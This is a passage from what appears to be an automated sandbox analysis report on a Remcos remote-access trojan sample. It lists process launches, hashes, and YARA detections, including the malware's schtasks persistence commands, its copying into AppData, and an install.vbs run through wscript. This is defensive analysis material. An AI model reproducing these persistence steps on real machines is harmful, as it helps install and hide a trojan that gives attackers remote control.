                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000C.00000002.2198158446.00000000022F3000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:29
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmpC5CF.tmp'
                                                                      Imagebase:0xe30000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:30
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:31
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Local\Temp\sm.exe
                                                                      Imagebase:0xd0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.2200733693.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:33
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                                                                      Imagebase:0x570000
                                                                      File size:141824 bytes
                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:46:35
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x4a7f0000
                                                                      File size:302592 bytes
                                                                      MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:46:36
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2234495030.00000000031A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.2233337169.00000000021FF000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.2233279859.00000000021A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 13%, ReversingLabs
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:41
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.2233130392.0000000002391000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2234270949.0000000003399000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000017.00000002.2233190842.00000000023C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:46
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp915.tmp'
                                                                      Imagebase:0xa90000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:07:46:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:47
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001B.00000002.2368586004.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:49
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\AppData\Roaming\Remcos\remcos.exe'
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001D.00000002.2260417476.0000000002275000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2261044314.0000000003209000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001D.00000002.2260325440.0000000002201000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:07:46:58
                                                                      Start date:06/01/2021
                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\kXLgfvFKbJs' /XML 'C:\Users\user\AppData\Local\Temp\tmp362D.tmp'
                                                                      Imagebase:0xa40000
                                                                      File size:179712 bytes
                                                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:07:46:59
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:07:47:00
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language

                                                                      General

                                                                      Start time:07:47:00
                                                                      Start date:06/01/2021
                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                      Imagebase:0x1b0000
                                                                      File size:691200 bytes
                                                                      MD5 hash:35D3F86C5715649C8A4273E6A52B0B54
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000022.00000002.2259696198.0000000000400000.00000040.00000001.sdmp, Author: unknown

                                                                      Disassembly

                                                                      Code Analysis
